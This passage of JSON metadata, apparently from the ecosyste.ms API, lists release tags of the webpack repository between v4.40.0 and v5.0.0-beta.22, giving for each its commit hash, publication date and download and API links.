0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650